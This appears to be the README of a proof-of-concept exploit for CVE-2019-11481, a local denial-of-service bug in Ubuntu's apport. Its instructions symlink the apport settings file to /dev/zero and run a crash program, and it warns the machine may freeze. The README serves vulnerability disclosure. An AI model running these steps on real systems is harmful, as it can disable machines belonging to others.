# Symlink traversal in apport (CVE-2019-11481)

[CVE-2019-11481](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11481)
is a local denial of service vulnerability in
[apport](https://launchpad.net/ubuntu/+source/apport).
If `~/.config/apport/settings` is a symlink,
then apport will read the target file,
even if it requires root privileges to read.
Apport usually errors out immediately after reading the file, though,
so I do not believe it is possible to exploit this vulnerability in an interesting way.
The full bug report is public on `bugs.launchpad.net`:
[bug 1830862](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1830862).

## Instructions

Please be aware that these instructions are likely to make your
computer completely unresponsive for several minutes.

```bash
make
mkdir -p ~/.config/apport
ln -s /dev/zero ~/.config/apport/settings
./segv
```

After running the exploit, don't forget to remove the malicious symlink:

```bash
rm ~/.config/apport/settings
```
